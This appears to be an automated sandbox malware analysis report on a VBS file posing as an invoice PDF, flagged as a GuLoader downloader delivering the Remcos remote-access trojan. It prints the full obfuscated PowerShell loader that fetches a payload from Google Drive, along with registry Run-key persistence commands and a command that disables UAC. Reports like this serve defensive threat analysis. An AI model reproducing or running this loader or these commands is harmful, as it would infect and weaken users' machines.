Malware Analysis Report

2025-01-02 03:20

Sample ID 240402-qphszabc6z
Target numer faktury_505603890324·pdf.vbs
SHA256 fe7ff83680ff3855e060227bddf560db0fe75b141db516320674dace99202224
Tags
guloader remcos remotehost downloader persistence rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

fe7ff83680ff3855e060227bddf560db0fe75b141db516320674dace99202224

Threat Level: Known bad

The file numer faktury_505603890324·pdf.vbs was found to be: Known bad.

Malicious Activity Summary

guloader remcos remotehost downloader persistence rat

Remcos

Guloader,Cloudeye

Blocklisted process makes network request

Checks computer location settings

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

Enumerates physical storage devices

Program crash

Modifies registry key

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-02 13:26

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-02 13:26

Reported

2024-04-02 13:28

Platform

win7-20240221-en

Max time kernel

61s

Max time network

132s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\numer faktury_505603890324·pdf.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Remcos

rat remcos

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\Tetrachromatic = "%Industrialiseres50% -w 1 $Cigarfring=(Get-ItemProperty -Path 'HKCU:\\Pectized\\').Syntakstegns;%Industrialiseres50% ($Cigarfring)" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\Rmc-KQ00DZ = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-KQ00DZ = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1808 wrote to memory of 2892 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1808 wrote to memory of 2892 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1808 wrote to memory of 2892 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2892 wrote to memory of 1108 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2892 wrote to memory of 1108 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2892 wrote to memory of 1108 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2892 wrote to memory of 1744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2892 wrote to memory of 1744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2892 wrote to memory of 1744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2892 wrote to memory of 1744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1744 wrote to memory of 2208 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1744 wrote to memory of 2208 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1744 wrote to memory of 2208 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1744 wrote to memory of 2208 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1744 wrote to memory of 2976 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1744 wrote to memory of 2976 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1744 wrote to memory of 2976 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1744 wrote to memory of 2976 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2976 wrote to memory of 2360 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2976 wrote to memory of 2360 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2976 wrote to memory of 2360 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2976 wrote to memory of 2360 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1744 wrote to memory of 2140 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1744 wrote to memory of 2140 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1744 wrote to memory of 2140 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1744 wrote to memory of 2140 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\numer faktury_505603890324·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Phenaceturic Betingelsesdel Biblioteksudlaanet Reshipments Eddikens Betsileos Manuma #>;$Peasantries=(cmd /c set /A 115^^0);Function Bundteksters ([String]$Exon){$Klimatologs=8;$Kemibgernsalivation=Volcano($Exon);For($Kemibger=7; $Kemibger -lt $Kemibgernsalivation; $Kemibger+=$Klimatologs){$Sidetallerkeners=$Exon.$Knapper.Invoke($Kemibger, 1);$Flatterers=$Flatterers+$Sidetallerkeners;}$Flatterers;}function Chivvy ($Tic){. ($melopoeic) ($Tic);}function Volcano ([String]$Ernringsfysiologerne){$Kimendes=$Ernringsfysiologerne.Length-1;$Kimendes;}$Peasantries=[char][int]$Peasantries;$Knapper=$Peasantries+'ubstring';$Skamrdmen=Bundteksters 'Organ,sTDisg.orrMerrymeaNonext,n Fluttesk.skadefCibo,sdeSkafninrVibraphrNsvisreiMatrikenCapillagUn ergr ';$Lazarist=Bundteksters 'UnclimbhNedgan,tHorsetotV,ldelipRettelss Notere:Skulk,n/ Autori/ClimactdCivi,isrLnindtgiHemiphrv Forli.eMotorbr.FortllegUdkonkuoCurvogroFugaci,g Af alklpeckingeSausage.Mi htescEgest,ooAmoknurmNegle.e/Proterouspine,ecOmbest.? EdnasceTrianguxSkulderpGlossapoboulevarBerettetSeletfa=.undevedInsug,nofondshaw Epita n oldninlv rdenso IrenesaScupperd La,oni& FritstiSt reomdBraciol=Rosenst1fors.ar7IndkomsE lederen Hainan3 solsortBjesstiBKies.elDParcookJHa,ideseG.ugeab6 FascinwRoentg VunavngiWAerifyiLRemanurbColdhearTofrontMdubleriBPhylloc2As.ylar3NedgrelHTowngatOGarb espcoloquipAstroma7underlgXIrrepeaU fbalanT H.ndreWRa etskdStoresl2Ph.ladiDDomflde ';$melopoeic=Bundteksters 'JournaliFil.ngieProwedaxUn.eare ';$fircylindrets=Bundteksters 'Xylocar$ VinlvmgDinornilScrofulolotteribbookboaaEuxe.itl Sc ewd:Stjert TunionisiThumbikl CrematsPrahmriaBandagenSpringedRegnefue Sekaned.ncowlme Un,urr Benigna=poles i GazomeS SuperitSigteliaRecirkurBe.wepttLeall.a-StvdragB HooteriP,ineuntUdbedrisUdaandeTOutplacrBibrin.a orskern SygneisNae.oidfAnkomneedipla,trBl.bber Rat.ish-ServobrS Cirkulo orskefuRegnvanrSaltlagcInt rmieStatspa Folkesk$UnderfaL KbenhaaFodboldz upersea TidnderGastroci JeaabnsVerdenstBo.sted Tropehj-Su,qualDNoncompeDisket.s,ydrocltUncongristuntmen I.islea Quarr tSensi aiSterlino St,imlnTropist Affolke$ AlcohoTH ltesaeOv.rrankIncarcesKisterstDoegngeiNonpunglC cilieaNetasderSelvantbFi,kedaeMadrigajSygeford BrugereErtholmrK ffrarsHagende ';Chivvy (Bundteksters 'Hundepi$ constig,erciallMis gynoRepentabWholelyaunmystilCaptans:SemiparTVandbadeStilisekBjer.stsFl kepotBundg,ritelepatlHydroseaEvoke,srThaneshbReparabeOver.asjFiresafdStartvreDe,kripr,eduktisB.atsch=Prepack$Gwineude Ad arsnHejrensvLystfis:LibelleaEngulfipTi,edespPosthusdhigh eaaBloatsttHemospoaDec bar ') ;Chivvy (Bundteksters 'MarksmaI ViscoumSeedcakpEquisidoWatchedr UdskydtQ oadse-,orgmesMWater eoSourbeldA.gribeuBortfall Rade,be Subtas RejsetiBShadcheiOptje.et Tanglos IndkliTT opophrForvandaoliniaanUnderlisCaninitfKeramike Blikv,r Oligom ') ;$Tekstilarbejders=$Tekstilarbejders+'\Gravrst.Coo' ;Chivvy (Bundteksters ' Heini.$ riegitgandels.l Maale,oAf opnibSl kaspaUnderv,l se icu: bloodiC TronfroChro.atu Slutk nFormndstDargerke Molassr EructkiTatarenn.llesfodHep tomeOwertern ExpecttAfsindiaTrebleptSuboptiiSeventyoOutflamn Kabine= iparia( AnecdoT ransmieNinetiesionisert Sukrin-E,iteriPDevolataEftersotFormat h Itam,l Saughen$Modera.T Tran,peSclerodkPlatonisnonvolutIndeholiSygeliglParahy aResundsrC managbDebil teConsentjC.mmododInconcle LignifrDy,frossTheftsr)Urinous ') ;while (-not $Counterindentation) {Chivvy (Bundteksters ' TurbopIbestyrefTeratog .onmanu(Sf,rmid$deenergTandouiliPhysapolPu tiersBlyholdaAftraednAsylst,dudsten.eTetra ydUnch lde Ob.kur.pro lamJSolsk noLif.odsb,erfidiSRollic,tObtenebasmitst.tPoitrineLindrin Rdkaa -BesprizecommunaqStm,ale Windsla$ CyclosSWebst.dkbesindea TelegrmSandvaar Bonmotd,issekkmReballoeVitrasenHjlpe i)Pertain Materia{O,erfreSSvips,ntUngatheavibrat rHermelitTerrito- LoblolSS ifflelmuscicaeBantusteUnen,hrpTraluce Samflel1 Unboun}UnmeltaeH,lesialFlerfamsIn,latoeSkattef{Tag rknSTandstitlovoveraLan,vinr BundfltKontr l-Telfon.SProjicelFr.landeSpecialePolychlpKulturp Transpi1re.sour; WeedieC TeglvrhFagraadiindertrv Somedev NonmonyStorebl Hall c$Autoca f Tred.eiAfbdendrDimittecDagafsnySs,ykkelSemiconiAfgrelsnGastropdCaponi,rTeks beeStukloftBaghaansForslvn}Kogepla ');Chivvy (Bundteksters 'udvikli$R.ducedg,nitterlRotatoroStraffebKystbanaKvaltprlPartici:HyperorCdr aattoS perdeuSwashbun P,eacct Mom.oleprocra rCentriciGendarmnUndef ad CowpieeVa.inaenA thenitY.gnobraMarty,it s.yllei ndtrdeoTimelnsn Cyanop=Me erie(PrluderTIdeentie T.ivlrsZonetertRegneud-TendovaPEvakueraNonseditA,etavlhDisting unfound$VrangmaTGuerr,lebiosyntkNonconcsProstattAdeuismi UniverlSmirks,aIsoproprEndetarbPartsfoeOcean,pjFolkered UnrevoeSomatogr mbassasFjernsy)Chu.kin ') ;}Chivvy (Bundteksters 'Fetolog$Selv,adg E,hanclWinegrooVindingbHu chinaDemissilBekmpel: JdedomH pouseheOprrskfnReinte vdetachriUngradus LumskenBeproseiFrbyvean La.ensgRazer ieFastprin Surre, Borger= Bmpele DukketeGCeromaneCyke.kut Unruin-h,wardsCUtilstroActinomnOpbygintStrandeeRoofersn heautot Ma,pak Galpes$Mi,eogrTDevanage LedelskDisk,tes .imulatDebatari Svampel BenediaStatskir A,golab ThisteeBoghvedjKreatiodLbetid eAnretnirKunstaksPolarog ');Chivvy (Bundteksters 'Spidska$k.ybbesgExplicali,citamo sammenbNullabla Husgerlbrinnyu:genotypb Plea.ae Con.enaDataopsu hin.ndmDrablyhoSknaandnIndt end Seetu.eAffatn, Blodba= Feltst Sovepil[BadevanSBud.etryAgrologsSnaps.ct Outbegetvelyd,m Afbeny.immunogCSlovenvoLate,tsnAfsp jlvPailsfueUnc.nnirRegionstFrstest]Flymeka: For ry: SerigrF GremaarOverhatoForcedsmSheafliB SateliaFlelseosUmuliggearts av6Apotele4Ufor.taSForkorttSkibstirHimm,lsiPrededinspygatmgAnastaz(.ikkerh$ PostmaHBeliggeeHoora enValgkonvBlokadeiI ternasMycetopnEmuersaiWondersn Efte lgAccolademedillenTngerne)Forfje, ');Chivvy (Bundteksters 'C,ocody$Nonri.agUnhandcl AfstbnofishboabMarnispaDeedinelCar.occ: NonfacUmindstenFiskerldarisinge.earninrVrd.ersf NstsvgoBirgittrMyosenhsS,bpacktSweetmeaSolutisaStil,ele Fa,ternEtherifd BegyndeStasisf Autofun=tilbage Charmer[C,lpurnSTelefony Be igtsP rietotForsmdee UglifimKob.erv.Barre,mT Udtrknebredygtx Secedet edirig.Exs uitENonwaivn rrivicC,icketoTickprod Electri GrsrodnDagpr.ggMusikra]termitb:Lugter.:CytosinApho,ocaSAltertaCLithopaIPhleba.ICu heab.AntinarGUtopiene oedelatAdfrd mSOve apptKas,emarNedkleniEmport nBar.ategUndersp(Un,ergo$Sta.islbbede,ageIndstniageron ouNonthinmWeddingoSpaniolnChilliedLaareneePing.in)Ph haly ');Chivvy (Bundteksters 'Dislik $KonverggVe,erinlAmtsboroDemontebThermoma BrstfllAfloese:.erraseDMaskinfr LineaeiVaabenlnInspisskThermoma entepebhabi iml WithgaeDefibrisVaginol=Indfrsl$PlagionUGruffien.hermotdClockcyeEmbryomrSupe.smfEksisteotrlkvinrBaadebrsMist lktFarmerea ,nformaAfryddee XylosinD.wnloadPlato,iem skinp.Th,ologsSkalksbu OverskbHgessoes ykkenftPartis.r PresswiOverflynsalooneg Thirty(Fost.rh3Appeten1 Veksli1.ienden2Con,ent2,dstopp3Rapunse,arom.tr3Cro,set1Forlibt3Unthi.k6S ralde7Chu chi)Svrmern ');Chivvy $Drinkables;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Phenaceturic Betingelsesdel Biblioteksudlaanet Reshipments Eddikens Betsileos Manuma #>;$Peasantries=(cmd /c set /A 115^^0);Function Bundteksters ([String]$Exon){$Klimatologs=8;$Kemibgernsalivation=Volcano($Exon);For($Kemibger=7; $Kemibger -lt $Kemibgernsalivation; $Kemibger+=$Klimatologs){$Sidetallerkeners=$Exon.$Knapper.Invoke($Kemibger, 1);$Flatterers=$Flatterers+$Sidetallerkeners;}$Flatterers;}function Chivvy ($Tic){. ($melopoeic) ($Tic);}function Volcano ([String]$Ernringsfysiologerne){$Kimendes=$Ernringsfysiologerne.Length-1;$Kimendes;}$Peasantries=[char][int]$Peasantries;$Knapper=$Peasantries+'ubstring';$Skamrdmen=Bundteksters 'Organ,sTDisg.orrMerrymeaNonext,n Fluttesk.skadefCibo,sdeSkafninrVibraphrNsvisreiMatrikenCapillagUn ergr ';$Lazarist=Bundteksters 'UnclimbhNedgan,tHorsetotV,ldelipRettelss Notere:Skulk,n/ Autori/ClimactdCivi,isrLnindtgiHemiphrv Forli.eMotorbr.FortllegUdkonkuoCurvogroFugaci,g Af alklpeckingeSausage.Mi htescEgest,ooAmoknurmNegle.e/Proterouspine,ecOmbest.? EdnasceTrianguxSkulderpGlossapoboulevarBerettetSeletfa=.undevedInsug,nofondshaw Epita n oldninlv rdenso IrenesaScupperd La,oni& FritstiSt reomdBraciol=Rosenst1fors.ar7IndkomsE lederen Hainan3 solsortBjesstiBKies.elDParcookJHa,ideseG.ugeab6 FascinwRoentg VunavngiWAerifyiLRemanurbColdhearTofrontMdubleriBPhylloc2As.ylar3NedgrelHTowngatOGarb espcoloquipAstroma7underlgXIrrepeaU fbalanT H.ndreWRa etskdStoresl2Ph.ladiDDomflde ';$melopoeic=Bundteksters 'JournaliFil.ngieProwedaxUn.eare ';$fircylindrets=Bundteksters 'Xylocar$ VinlvmgDinornilScrofulolotteribbookboaaEuxe.itl Sc ewd:Stjert TunionisiThumbikl CrematsPrahmriaBandagenSpringedRegnefue Sekaned.ncowlme Un,urr Benigna=poles i GazomeS SuperitSigteliaRecirkurBe.wepttLeall.a-StvdragB HooteriP,ineuntUdbedrisUdaandeTOutplacrBibrin.a orskern SygneisNae.oidfAnkomneedipla,trBl.bber Rat.ish-ServobrS Cirkulo orskefuRegnvanrSaltlagcInt rmieStatspa Folkesk$UnderfaL KbenhaaFodboldz upersea TidnderGastroci JeaabnsVerdenstBo.sted Tropehj-Su,qualDNoncompeDisket.s,ydrocltUncongristuntmen I.islea Quarr tSensi aiSterlino St,imlnTropist Affolke$ AlcohoTH ltesaeOv.rrankIncarcesKisterstDoegngeiNonpunglC cilieaNetasderSelvantbFi,kedaeMadrigajSygeford BrugereErtholmrK ffrarsHagende ';Chivvy (Bundteksters 'Hundepi$ constig,erciallMis gynoRepentabWholelyaunmystilCaptans:SemiparTVandbadeStilisekBjer.stsFl kepotBundg,ritelepatlHydroseaEvoke,srThaneshbReparabeOver.asjFiresafdStartvreDe,kripr,eduktisB.atsch=Prepack$Gwineude Ad arsnHejrensvLystfis:LibelleaEngulfipTi,edespPosthusdhigh eaaBloatsttHemospoaDec bar ') ;Chivvy (Bundteksters 'MarksmaI ViscoumSeedcakpEquisidoWatchedr UdskydtQ oadse-,orgmesMWater eoSourbeldA.gribeuBortfall Rade,be Subtas RejsetiBShadcheiOptje.et Tanglos IndkliTT opophrForvandaoliniaanUnderlisCaninitfKeramike Blikv,r Oligom ') ;$Tekstilarbejders=$Tekstilarbejders+'\Gravrst.Coo' ;Chivvy (Bundteksters ' Heini.$ riegitgandels.l Maale,oAf opnibSl kaspaUnderv,l se icu: bloodiC TronfroChro.atu Slutk nFormndstDargerke Molassr EructkiTatarenn.llesfodHep tomeOwertern ExpecttAfsindiaTrebleptSuboptiiSeventyoOutflamn Kabine= iparia( AnecdoT ransmieNinetiesionisert Sukrin-E,iteriPDevolataEftersotFormat h Itam,l Saughen$Modera.T Tran,peSclerodkPlatonisnonvolutIndeholiSygeliglParahy aResundsrC managbDebil teConsentjC.mmododInconcle LignifrDy,frossTheftsr)Urinous ') ;while (-not $Counterindentation) {Chivvy (Bundteksters ' TurbopIbestyrefTeratog .onmanu(Sf,rmid$deenergTandouiliPhysapolPu tiersBlyholdaAftraednAsylst,dudsten.eTetra ydUnch lde Ob.kur.pro lamJSolsk noLif.odsb,erfidiSRollic,tObtenebasmitst.tPoitrineLindrin Rdkaa -BesprizecommunaqStm,ale Windsla$ CyclosSWebst.dkbesindea TelegrmSandvaar Bonmotd,issekkmReballoeVitrasenHjlpe i)Pertain Materia{O,erfreSSvips,ntUngatheavibrat rHermelitTerrito- LoblolSS ifflelmuscicaeBantusteUnen,hrpTraluce Samflel1 Unboun}UnmeltaeH,lesialFlerfamsIn,latoeSkattef{Tag rknSTandstitlovoveraLan,vinr BundfltKontr l-Telfon.SProjicelFr.landeSpecialePolychlpKulturp Transpi1re.sour; WeedieC TeglvrhFagraadiindertrv Somedev NonmonyStorebl Hall c$Autoca f Tred.eiAfbdendrDimittecDagafsnySs,ykkelSemiconiAfgrelsnGastropdCaponi,rTeks beeStukloftBaghaansForslvn}Kogepla ');Chivvy (Bundteksters 'udvikli$R.ducedg,nitterlRotatoroStraffebKystbanaKvaltprlPartici:HyperorCdr aattoS perdeuSwashbun P,eacct Mom.oleprocra rCentriciGendarmnUndef ad CowpieeVa.inaenA thenitY.gnobraMarty,it s.yllei ndtrdeoTimelnsn Cyanop=Me erie(PrluderTIdeentie T.ivlrsZonetertRegneud-TendovaPEvakueraNonseditA,etavlhDisting unfound$VrangmaTGuerr,lebiosyntkNonconcsProstattAdeuismi UniverlSmirks,aIsoproprEndetarbPartsfoeOcean,pjFolkered UnrevoeSomatogr mbassasFjernsy)Chu.kin ') ;}Chivvy (Bundteksters 'Fetolog$Selv,adg E,hanclWinegrooVindingbHu chinaDemissilBekmpel: JdedomH pouseheOprrskfnReinte vdetachriUngradus LumskenBeproseiFrbyvean La.ensgRazer ieFastprin Surre, Borger= Bmpele DukketeGCeromaneCyke.kut Unruin-h,wardsCUtilstroActinomnOpbygintStrandeeRoofersn heautot Ma,pak Galpes$Mi,eogrTDevanage LedelskDisk,tes .imulatDebatari Svampel BenediaStatskir A,golab ThisteeBoghvedjKreatiodLbetid eAnretnirKunstaksPolarog ');Chivvy (Bundteksters 'Spidska$k.ybbesgExplicali,citamo sammenbNullabla Husgerlbrinnyu:genotypb Plea.ae Con.enaDataopsu hin.ndmDrablyhoSknaandnIndt end Seetu.eAffatn, Blodba= Feltst Sovepil[BadevanSBud.etryAgrologsSnaps.ct Outbegetvelyd,m Afbeny.immunogCSlovenvoLate,tsnAfsp jlvPailsfueUnc.nnirRegionstFrstest]Flymeka: For ry: SerigrF GremaarOverhatoForcedsmSheafliB SateliaFlelseosUmuliggearts av6Apotele4Ufor.taSForkorttSkibstirHimm,lsiPrededinspygatmgAnastaz(.ikkerh$ PostmaHBeliggeeHoora enValgkonvBlokadeiI ternasMycetopnEmuersaiWondersn Efte lgAccolademedillenTngerne)Forfje, ');Chivvy (Bundteksters 'C,ocody$Nonri.agUnhandcl AfstbnofishboabMarnispaDeedinelCar.occ: NonfacUmindstenFiskerldarisinge.earninrVrd.ersf NstsvgoBirgittrMyosenhsS,bpacktSweetmeaSolutisaStil,ele Fa,ternEtherifd BegyndeStasisf Autofun=tilbage Charmer[C,lpurnSTelefony Be igtsP rietotForsmdee UglifimKob.erv.Barre,mT Udtrknebredygtx Secedet edirig.Exs uitENonwaivn rrivicC,icketoTickprod Electri GrsrodnDagpr.ggMusikra]termitb:Lugter.:CytosinApho,ocaSAltertaCLithopaIPhleba.ICu heab.AntinarGUtopiene oedelatAdfrd mSOve apptKas,emarNedkleniEmport nBar.ategUndersp(Un,ergo$Sta.islbbede,ageIndstniageron ouNonthinmWeddingoSpaniolnChilliedLaareneePing.in)Ph haly ');Chivvy (Bundteksters 'Dislik $KonverggVe,erinlAmtsboroDemontebThermoma BrstfllAfloese:.erraseDMaskinfr LineaeiVaabenlnInspisskThermoma entepebhabi iml WithgaeDefibrisVaginol=Indfrsl$PlagionUGruffien.hermotdClockcyeEmbryomrSupe.smfEksisteotrlkvinrBaadebrsMist lktFarmerea ,nformaAfryddee XylosinD.wnloadPlato,iem skinp.Th,ologsSkalksbu OverskbHgessoes ykkenftPartis.r PresswiOverflynsalooneg Thirty(Fost.rh3Appeten1 Veksli1.ienden2Con,ent2,dstopp3Rapunse,arom.tr3Cro,set1Forlibt3Unthi.k6S ralde7Chu chi)Svrmern ');Chivvy $Drinkables;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tetrachromatic" /t REG_EXPAND_SZ /d "%Industrialiseres50% -w 1 $Cigarfring=(Get-ItemProperty -Path 'HKCU:\Pectized\').Syntakstegns;%Industrialiseres50% ($Cigarfring)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tetrachromatic" /t REG_EXPAND_SZ /d "%Industrialiseres50% -w 1 $Cigarfring=(Get-ItemProperty -Path 'HKCU:\Pectized\').Syntakstegns;%Industrialiseres50% ($Cigarfring)"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\ProgramData\Remcos\remcos.exe

"C:\ProgramData\Remcos\remcos.exe"

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
NL 142.251.39.97:443 drive.usercontent.google.com tcp
GB 142.250.187.206:443 drive.google.com tcp
NL 142.251.39.97:443 drive.usercontent.google.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\Cleach.txt

MD5 e5360b80e5ad014472ba4b907fb36e79
SHA1 ac0f4c89649ffd2f6f436c47a4e0dadd9244e812
SHA256 4ba1176eb662a70d6b63a0f2dd0530e310cd3bc30eb9e90d53609e6689088b0b
SHA512 b42164e738b87cad6ef337f9081313cd366a958a7733c52f516a2b6c184c0aa39c0cf1b9f2c37a2d9ad1fd088fe3573d56985b4b8d1ad39817cf3d0df2cb44cd

C:\Users\Admin\AppData\Local\Temp\Cleach.txt

MD5 a72f144772db859658fa4bb27cc936da
SHA1 143ad7783080fc3ca4be706d151b07c2f461029f
SHA256 0b1f4458c75c032ce274ecc900b56c41abf4a5811fe2cddede96efd3fd503fdc
SHA512 3e9eef7eeeffcaf4ef7b064fdb783e2ee940c41e4454d54cd74d9f2dc94355163304bc282a54a93a36a3692f08c99b91c2bd2ba093cdd3f895907b85aea0e970

C:\Users\Admin\AppData\Local\Temp\Cleach.txt

MD5 832c41fd1505c74d7c41e1c57ec0562c
SHA1 69940e96d42a950d5453eed27ce554a5651ca5fa
SHA256 4033c0fc7d710e05edb7cc24a63d1c37443c6d181203c895a4d7438a2259e9b3
SHA512 9715c92293738222c502d42416b4a1892b55bf49eb467c59c947f5bb8037b2abfc9240dfde7042f12f2d133a5f2ec324e83bc1813405b528d6bdf7b3ca63c2a4

C:\Users\Admin\AppData\Local\Temp\Cleach.txt

MD5 c132ead93dd767c6f441efc59786eb6c
SHA1 7d35d3ed07d81c00bdc965a23b7a587a4285d818
SHA256 a5e18065666df9865e94c3f20e3657b0224912d9d877e8564ee99eef4a67844b
SHA512 de5f572665f07a30d2f2371cff8e4960440e16e91a00c6d90e3ef2be9865b793d4fa4370be86b9ad072b725d1302ecb9fa490720d81188246f86792f9096af9e

C:\Users\Admin\AppData\Local\Temp\Cleach.txt

MD5 eef15c25b6f384e6ab7f1f306f5d0e07
SHA1 4b3b0a4fdcbea1e6e9163db27955d2a3f9af43b0
SHA256 57501d3926ec5ef84ef528b1e8ff1bc0adc9fef9eb10d88bea9d92432f0854c9
SHA512 fe7f57260ea9b8d0e8f42b02caeb44ca6146350362739d03ba2ae7c3c79322e6a33c334aa17464892f59614a43eba152551ebe426d43fae4002337c116bc5120

memory/2892-280-0x000000001B280000-0x000000001B562000-memory.dmp

memory/2892-281-0x0000000002310000-0x0000000002318000-memory.dmp

memory/2892-282-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

memory/2892-284-0x0000000002550000-0x00000000025D0000-memory.dmp

memory/2892-283-0x0000000002550000-0x00000000025D0000-memory.dmp

memory/2892-285-0x0000000002550000-0x00000000025D0000-memory.dmp

memory/2892-286-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

memory/2892-287-0x0000000002550000-0x00000000025D0000-memory.dmp

memory/2892-288-0x00000000029A0000-0x00000000029C2000-memory.dmp

memory/2892-289-0x00000000027C0000-0x00000000027D2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NY6CI6HC1MK7T0ID6OPV.temp

